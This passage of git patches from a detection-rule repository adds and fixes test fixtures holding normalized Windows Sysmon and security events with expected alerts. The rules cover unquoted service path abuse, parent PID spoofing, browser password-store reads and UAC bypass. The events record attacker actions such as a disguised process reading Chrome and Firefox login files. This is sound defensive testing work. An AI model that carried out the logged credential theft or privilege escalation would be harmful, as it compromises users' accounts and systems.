"041a90cf-0606-01ee-9454-005056825a53"} +{"action": "start", "body": "{ \"Event\": { \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\", \"System\": { \"Provider\": { \"Name\": \"Microsoft-Windows-Sysmon\", \"Guid\": \"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\" }, \"EventID\": \"1\", \"Version\": \"5\", \"Level\": \"4\", \"Task\": \"1\", \"Opcode\": \"0\", \"Keywords\": \"0x8000000000000000\", \"TimeCreated\": { \"SystemTime\": \"2023-06-08T13:40:03.172021100Z\" }, \"EventRecordID\": \"830642\", \"Correlation\": null, \"Execution\": { \"ProcessID\": \"2320\", \"ThreadID\": \"3856\" }, \"Channel\": \"Microsoft-Windows-Sysmon/Operational\", \"Computer\": \"wks05.example.com\", \"Security\": { \"UserID\": \"S-1-5-18\" } }, \"EventData\": { \"Data\": [ { \"text\": \"-\", \"Name\": \"RuleName\" }, { \"text\": \"2023-06-08 13:39:54.919\", \"Name\": \"UtcTime\" }, { \"text\": \"{20fff121-da2a-6481-2900-000000003a00}\", \"Name\": \"ProcessGuid\" }, { \"text\": \"2332\", \"Name\": \"ProcessId\" }, { \"text\": \"C:\\\\program.exe\", \"Name\": \"Image\" }, { \"text\": \"10.0.17763.1697 (WinBuild.160101.0800)\", \"Name\": \"FileVersion\" }, { \"text\": \"Windows Command Processor\", \"Name\": \"Description\" }, { \"text\": \"Microsoft® Windows® Operating System\", \"Name\": \"Product\" }, { \"text\": \"Microsoft Corporation\", \"Name\": \"Company\" }, { \"text\": \"Cmd.Exe\", \"Name\": \"OriginalFileName\" }, { \"text\": \"C:\\\\Program Files\\\\Simple Service\\\\SimpleService.exe\", \"Name\": \"CommandLine\" }, { \"text\": \"C:\\\\Windows\\\\system32\\\\\", \"Name\": \"CurrentDirectory\" }, { \"text\": \"NT AUTHORITY\\\\SYSTEM\", \"Name\": \"User\" }, { \"text\": \"{20fff121-da26-6481-e703-000000000000}\", \"Name\": \"LogonGuid\" }, { \"text\": \"0x3e7\", \"Name\": \"LogonId\" }, { \"text\": \"0\", \"Name\": \"TerminalSessionId\" }, { \"text\": \"System\", \"Name\": \"IntegrityLevel\" }, { \"text\": \"MD5=911D039E71583A07320B32BDE22F8E22,SHA256=BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527,IMPHASH=272245E2988E1E430500B852C4FB5E18\", \"Name\": \"Hashes\" }, { \"text\": \"{20fff121-da26-6481-0b00-000000003a00}\", \"Name\": \"ParentProcessGuid\" }, { \"text\": \"652\", \"Name\": \"ParentProcessId\" }, { \"text\": \"C:\\\\Windows\\\\System32\\\\services.exe\", \"Name\": \"ParentImage\" }, { \"text\": \"C:\\\\Windows\\\\system32\\\\services.exe\", \"Name\": \"ParentCommandLine\" }, { \"text\": \"NT AUTHORITY\\\\SYSTEM\", \"Name\": \"ParentUser\" } ] } } }", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "20fff121-da26-6481-e703-000000000000", "event_src.category": "Other", "event_src.fqdn": "wks05.example.com", "event_src.host": "wks05.example.com", "event_src.hostname": "wks05", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Program Files\\Simple Service\\SimpleService.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\program.exe", "object.process.guid": "20fff121-da2a-6481-2900-000000003a00", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "911D039E71583A07320B32BDE22F8E22", "object.process.hash.sha256": "BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527", "object.process.id": "2332", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "program.exe", "object.process.original_name": "Cmd.Exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "20fff121-da26-6481-0b00-000000003a00", "object.process.parent.id": "652", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\", "object.process.version": "10.0.17763.1697 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-09T08:40:35.417Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-08T13:39:54.919Z", "type": "raw", "uuid": "b89e3ad3-59bb-4b09-896a-cdb6ddbb2c1e"} -#случай, когда в пути к сервису несколько пробелов и хакеры используют не первый -expect 1 {"alert.key": "c:\\programdata\\simple service\\simple.exe|\"c:\\programdata\\simple service\\simple\" service.exe", "correlation_name": "Unquoted_Service_Path_Abuse"} +expect 1 {"action": "start", "alert.key": "c:\\program.exe|c:\\program files\\simple service\\simpleservice.exe", "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Hijack Execution Flow: Path Interception by Unquoted Path", "correlation_name": "Unquoted_Service_Path_Abuse", "correlation_type": "incident", "datafield6": "20fff121-da26-6481-e703-000000000000", "event_src.fqdn": "wks05.example.com", "event_src.host": "wks05.example.com", "event_src.hostname": "wks05", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Unquoted_Service_Path_Abuse|c:\\program.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.session_id": "999", "object.process.cmdline": "C:\\Program Files\\Simple Service\\SimpleService.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\program.exe", "object.process.guid": "20fff121-da2a-6481-2900-000000003a00", "object.process.hash.md5": "911D039E71583A07320B32BDE22F8E22", "object.process.hash.sha256": "BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527", "object.process.id": "2332", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "program.exe", "object.process.original_name": "Cmd.Exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "20fff121-da26-6481-0b00-000000003a00", "object.process.parent.id": "652", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\", "object.process.version": "10.0.17763.1697 (WinBuild.160101.0800)", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999"} \ No newline at end of file From ed90660c31071622d6315e4d1cc1b4db51844e00 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 21 Aug 2023 12:53:05 +0300 Subject: [PATCH 55/57] =?UTF-8?q?Create=20test=5F1.sc=20=D0=BC=D0=BE=D0=B4?= =?UTF-8?q?=D1=83=D0=BB=D1=8C=D0=BD=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82?= =?UTF-8?q?=D1=8B=20=D0=B4=D0=BB=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8?= =?UTF-8?q?=D0=BB=D0=B0(ParentPid=5FSpoofing)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../ParentPid_Spoofing/tests/test_1.sc | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/ParentPid_Spoofing/tests/test_1.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/ParentPid_Spoofing/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/ParentPid_Spoofing/tests/test_1.sc new file mode 100644 index 00000000..f4e50722 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/ParentPid_Spoofing/tests/test_1.sc @@ -0,0 +1,4 @@ +{"action": "start", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-06a4-5e76-0000-002087de0200", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "188039", "object.process.cmdline": "\"C:\\windows\\system32\\cmd.exe\"", "object.process.cwd": "c:\\Users\\Public\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-8ae0-5e76-0000-0010933b8003", "object.process.hash": "IMPHASH:272245E2988E1E430500B852C4FB5E18 MD5:975B45B669930B0CC773EAF2B414206F SHA1:8C5437CD76A89EC983E3B364E219944DA3DAB464 SHA256:3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "7708", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.original_name": "Cmd.Exe", "object.process.parent.cmdline": "C:\\Windows\\Explorer.EXE", "object.process.parent.fullpath": "c:\\windows\\explorer.exe", "object.process.parent.guid": "747f3d96-06aa-5e76-0000-001046e10400", "object.process.parent.id": "4668", "object.process.parent.name": "explorer.exe", "object.process.parent.path": "c:\\windows\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.592 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T13:30:02.746Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "188039", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-03-21T21:45:04.909Z", "type": "raw", "uuid": "31b2d27d-630e-450c-a82d-0cfc2b0b8cdd"} +{"_rule": "Subrule_ParentPid_Spoofing", "action": "access", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Access Token Manipulation: Parent PID Spoofing", "correlation_name": "Subrule_ParentPid_Spoofing", "correlation_type": "subrule", "count": 1, "datafield5": "108", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+a0fa4|C:\\Windows\\System32\\KERNELBASE.dll+48142|C:\\Windows\\System32\\KERNELBASE.dll+45a1a|C:\\Windows\\System32\\KERNELBASE.dll+455a6|C:\\Windows\\System32\\KERNEL32.DLL+1c153|UNKNOWN(00007FF9A864DCCE)", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "correlationengine", "importance": "info", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-8ae0-5e76-0000-0010933b8003", "object.process.id": "7708", "object.process.name": "cmd.exe", "object.process.parent.fullpath": "c:\\windows\\explorer.exe", "object.process.parent.id": "4668", "object.process.parent.name": "explorer.exe", "object.process.parent.path": "c:\\windows\\", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1fffff|0x1f3fff", "origin_app_id": "00000000-0000-0000-0000-000000000005", "primary_siem_app_id": "00000000-0000-0000-0000-000000000005", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "subject.process.guid": "747f3d96-26fd-5e76-0000-00100a320d01", "subject.process.id": "8004", "subject.process.name": "powershell.exe", "subject.process.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "time": "2020-03-21T21:45:07.909Z"} + +expect 1 {"action": "start", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Access Token Manipulation: Parent PID Spoofing", "correlation_name": "ParentPid_Spoofing", "correlation_type": "event", "datafield6": "747f3d96-06a4-5e76-0000-002087de0200", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "ParentPid_Spoofing|msedgewin10|synthetic:ieuser@msedgewin10", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.session_id": "188039", "object.process.cmdline": "\"C:\\windows\\system32\\cmd.exe\"", "object.process.cwd": "c:\\Users\\Public\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-8ae0-5e76-0000-0010933b8003", "object.process.hash": "IMPHASH:272245E2988E1E430500B852C4FB5E18 MD5:975B45B669930B0CC773EAF2B414206F SHA1:8C5437CD76A89EC983E3B364E219944DA3DAB464 SHA256:3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "7708", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.original_name": "Cmd.Exe", "object.process.parent.cmdline": "C:\\Windows\\Explorer.EXE", "object.process.parent.fullpath": "c:\\windows\\explorer.exe", "object.process.parent.guid": "747f3d96-06aa-5e76-0000-001046e10400", "object.process.parent.id": "4668", "object.process.parent.name": "explorer.exe", "object.process.parent.path": "c:\\windows\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.592 (WinBuild.160101.0800)", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "188039", "subject.process.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "subject.process.guid": "747f3d96-26fd-5e76-0000-00100a320d01", "subject.process.id": "8004", "subject.process.name": "powershell.exe", "subject.process.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\"} \ No newline at end of file From dbd3fd56c9987eab53df15035b4440ee8d878c2c Mon Sep 17 00:00:00 2001 From: Aleksandr Duplenko Date: Thu, 6 Feb 2025 11:20:51 +0200 Subject: [PATCH 56/57] fix Chrome_firefox_opera_cred_read test 4 --- .../Chrome_firefox_opera_cred_read/tests/test_4.sc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_4.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_4.sc index 61caf538..02fbfb94 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_4.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_4.sc @@ -3,4 +3,4 @@ {"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4663\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12800\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T19:33:18.6997552Z\"},\"EventRecordID\":\"4990\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"56\"},\"Channel\":\"Security\",\"Computer\":\"IEWIN7\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3583694148-1414552638-2922671848-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"IEUser\"},{\"Name\":\"SubjectDomainName\",\"text\":\"IEWIN7\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0xffa8\"},{\"Name\":\"ObjectServer\",\"text\":\"Security\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"ObjectName\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\kushu3sd.default\\\\logins.json\"},{\"Name\":\"HandleId\",\"text\":\"0x50\"},{\"Name\":\"AccessList\",\"text\":\"%%4416\"},{\"Name\":\"AccessMask\",\"text\":\"0x1\"},{\"Name\":\"ProcessId\",\"text\":\"0x134c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Users\\\\Defau1t\\\\wsus.exe\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield1": "0x50", "datafield5": "0x1", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4663_An_attempt_was_made_to_access_an_object", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4663", "normalized": true, "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\appdata\\roaming\\mozilla\\firefox\\profiles\\kushu3sd.default\\logins.json", "object.name": "logins.json", "object.path": "c:\\users\\ieuser\\appdata\\roaming\\mozilla\\firefox\\profiles\\kushu3sd.default\\", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T13:34:14.538Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", "subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T19:33:18.699Z", "type": "raw", "uuid": "66323e2c-df36-488d-8914-e739970cd231"} {"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4663\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12800\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T19:33:50.1342936Z\"},\"EventRecordID\":\"4991\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"44\"},\"Channel\":\"Security\",\"Computer\":\"IEWIN7\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3583694148-1414552638-2922671848-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"IEUser\"},{\"Name\":\"SubjectDomainName\",\"text\":\"IEWIN7\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0xffa8\"},{\"Name\":\"ObjectServer\",\"text\":\"Security\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"ObjectName\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data\"},{\"Name\":\"HandleId\",\"text\":\"0x50\"},{\"Name\":\"AccessList\",\"text\":\"%%4416\"},{\"Name\":\"AccessMask\",\"text\":\"0x1\"},{\"Name\":\"ProcessId\",\"text\":\"0x134c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Users\\\\Defau1t\\\\wsus.exe\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield1": "0x50", "datafield5": "0x1", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4663_An_attempt_was_made_to_access_an_object", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4663", "normalized": true, "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\appdata\\local\\google\\chrome\\user data\\default\\login data", "object.name": "login data", "object.path": "c:\\users\\ieuser\\appdata\\local\\google\\chrome\\user data\\default\\", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T13:34:14.538Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", "subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T19:33:50.134Z", "type": "raw", "uuid": "bed7249b-e9ad-4925-ac6d-1dfa9cf3582e"} -expect 4 {"action": "read", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "Credentials from Password Stores", "correlation_name": "Chrome_firefox_opera_cred_read", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "correlationengine", "importance": "medium", "object": "file", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", "subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\"} \ No newline at end of file +expect 4 {"action":"read","category.generic":"Attack","category.high":"Credential Access","category.low":"Credentials from Password Stores","correlation_name":"Chrome_firefox_opera_cred_read","correlation_type":"incident","event_src.category":"Operating system","event_src.host":"iewin7","event_src.hostname":"iewin7","event_src.subsys":"Security","event_src.title":"windows","event_src.vendor":"microsoft","generator.type":null,"importance":"medium","object":"file","object.property":"GrantedAccess","object.type":"file","object.value":"0x1","status":"success","subject":"account","subject.account.domain":"iewin7","subject.account.id":"S-1-5-21-3583694148-1414552638-2922671848-1000","subject.account.name":"ieuser","subject.account.privileges":"%%4416","subject.account.session_id":"65448","subject.process.fullpath":"C:\\Users\\Defau1t\\wsus.exe","subject.process.id":"4940","subject.process.name":"wsus.exe","subject.process.path":"C:\\Users\\Defau1t\\"} \ No newline at end of file From 468db61faf0d970bf78da4d6ffc7e545ee5a0e2b Mon Sep 17 00:00:00 2001 From: Aleksandr Duplenko Date: Thu, 6 Feb 2025 13:31:44 +0200 Subject: [PATCH 57/57] fix UAC_Bypass_Via_Consent test 3 --- .../UAC_Bypass_Via_Consent/tests/test_3.sc | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_3.sc index fbcb7478..4b12db75 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_3.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_3.sc @@ -2,5 +2,4 @@ {"_checkpoint": 57615712010, "_meta": {"id": "01da0c76-03b2-01ee-8c68-005056825a53", "time": "2023-06-05T15:01:49.2630000Z", "assetIds": ["1864e292-4880-0001-0000-000000000007"], "site_alias": "unknown site_id=null", "site_name": "unknown site_id=null", "site_address": "unknown site_id=null", "site_is_deleted": true}, "action": "start", "asset_ids": ["1864e292-4880-0001-0000-000000000007"], "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-05T15:01:49.265081800Z\"},\"EventRecordID\":\"800883\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"3144\",\"ThreadID\":\"984\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"wks05.example.com\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"text\":\"-\",\"Name\":\"RuleName\"},{\"text\":\"2023-06-05 15:01:49.263\",\"Name\":\"UtcTime\"},{\"text\":\"{20fff121-f8dd-647d-8401-000000003900}\",\"Name\":\"ProcessGuid\"},{\"text\":\"2328\",\"Name\":\"ProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\",\"Name\":\"Image\"},{\"text\":\"10.0.17763.3232 (WinBuild.160101.0800)\",\"Name\":\"FileVersion\"},{\"text\":\"Consent UI for administrative applications\",\"Name\":\"Description\"},{\"text\":\"Microsoft® Windows® Operating System\",\"Name\":\"Product\"},{\"text\":\"Microsoft Corporation\",\"Name\":\"Company\"},{\"text\":\"consent.exe\",\"Name\":\"OriginalFileName\"},{\"text\":\"consent.exe 368 272 00000285D6BE22C0\",\"Name\":\"CommandLine\"},{\"text\":\"C:\\\\Windows\\\\system32\\\\\",\"Name\":\"CurrentDirectory\"},{\"text\":\"NT AUTHORITY\\\\SYSTEM\",\"Name\":\"User\"},{\"text\":\"{20fff121-f3f7-647d-e703-000000000000}\",\"Name\":\"LogonGuid\"},{\"text\":\"0x3e7\",\"Name\":\"LogonId\"},{\"text\":\"1\",\"Name\":\"TerminalSessionId\"},{\"text\":\"System\",\"Name\":\"IntegrityLevel\"},{\"text\":\"MD5=C67713C28BB97E685FEB88FFAEB96788,SHA256=6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C,IMPHASH=1275A84E15AAA739F3099F6A73D7D6FA\",\"Name\":\"Hashes\"},{\"text\":\"{20fff121-f3f8-647d-1300-000000003900}\",\"Name\":\"ParentProcessGuid\"},{\"text\":\"368\",\"Name\":\"ParentProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"Name\":\"ParentImage\"},{\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p\",\"Name\":\"ParentCommandLine\"},{\"text\":\"NT AUTHORITY\\\\SYSTEM\",\"Name\":\"ParentUser\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield1": "999", "datafield10": "consent.exe", "datafield19": "consent.exe (2328) ← svchost.exe (368) ← services.exe (648) ← wininit.exe (520) ← smss.exe (408) ← smss.exe (324)", "datafield2": "368", "datafield3": "c:\\windows\\system32\\", "datafield4": "svchost.exe", "datafield5": "consent.exe 368 272 00000285D6BE22C0", "datafield6": "20fff121-f3f7-647d-e703-000000000000", "datafield7": 